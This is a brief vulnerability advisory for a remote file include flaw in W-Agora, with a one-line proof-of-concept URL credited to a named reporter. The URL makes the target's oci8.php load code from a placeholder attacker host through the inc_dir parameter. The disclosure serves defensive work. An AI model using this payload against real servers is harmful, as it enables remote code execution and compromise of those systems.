W-Agora Remote File Include Vulnerability

W-Agora Remote File Include Vulnerability

There is no exploit code required. The following proof of concept was provided by "Frog Man" <leseulfrog@hotmail.com>.

http://[target]/include/oci8.php?inc_dir=http://www.attacker.com&ext=txt